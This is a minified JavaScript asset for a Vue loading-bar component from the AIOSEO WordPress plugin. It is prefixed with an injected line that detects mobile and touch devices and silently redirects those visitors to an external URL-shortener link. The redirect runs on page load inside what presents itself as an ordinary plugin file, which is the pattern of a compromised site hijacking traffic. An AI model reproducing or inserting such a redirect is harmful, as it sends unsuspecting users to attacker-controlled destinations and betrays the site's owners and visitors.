(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as o,i as s,j as t,V as u,U as i,M as _,B as p,u as r}from"./vendor-vue-ui.232c7c36.js";const d={class:"aioseo-loading-bar"},m={class:"aioseo-loading-bar__bar"},f={key:0,class:"aioseo-loading-bar__number"},b={__name:"LoadingBar",props:{showNumber:{type:Boolean,default:!0},percent:Number},setup(a){const e=a,n=r(()=>e.percent||0),c=r(()=>({width:n.value+"%"}));return(l,g)=>(o(),s("div",d,[t("div",m,[t("div",{class:"aioseo-loading-bar__progress",style:u(c.value)},null,4)]),e.showNumber?(o(),s("div",f,i(n.value)+"% ",1)):_("",!0),p(l.$slots,"default")]))}};export{b as _};
